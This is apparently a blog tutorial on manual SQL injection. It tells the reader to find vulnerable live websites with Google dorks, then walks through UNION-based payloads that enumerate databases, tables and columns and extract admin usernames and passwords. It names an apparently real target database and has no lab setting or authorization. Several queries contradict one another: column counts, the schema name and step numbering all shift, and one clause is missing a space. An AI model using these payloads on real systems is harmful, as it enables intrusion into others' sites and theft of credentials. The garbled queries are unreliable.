Manual Sql Injection


 Manual Sql Injection Attack

SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system. SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to effect the execution of predefined SQL commands.

Need to find out a sql vulnerable site : 
To find a sql vulnerable website we will use some google Dorks from following:
inurl:index.php?id=  
inurl:trainers.php?id= 
inurl:buy.php?category= 
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:Pageid= 


Step 1: Finding Vulnerable Link -


Add ' After id=3

If SQL Syntax Error is shown or blank page then site is Vulnerable to SQL Injection.

Step 2: Finding Vulnerable Columns -


order by 8 --

if again error is shown or blank page occured then

Vulnerable columns are 7.

Step 3: Finding Number of Vulnerable Columns:



union all select 1,2,3,4,5,6,7 --
if number 2 is shown then this column can give us database,tables & columns

Step 4 Finding Database

union all select 1,database(),3,4,5,6,7 --

chennaisilks

Step 5: Finding Table Names:


union all select 1,table_name,3,4,5,6 from  information_schema.tables wheretable_schema='chennaisilks' --

Step 6: Finding Column Names:




union all select 1,column_name,3,4,5,6,7

from information_schema.columns where

table_schema='blogtest' --


Admin table is admin

Admin Columns are

admin_id
user_id
admin_pwd
admin_email
admin_last_login
admin_ip




Step 6: Finding Admin username & password:


union all select 1,user_id,3,4,5,6,7 from admin --


union all select 1,admin_pwd,3,4,5,6,7 from admin --


Source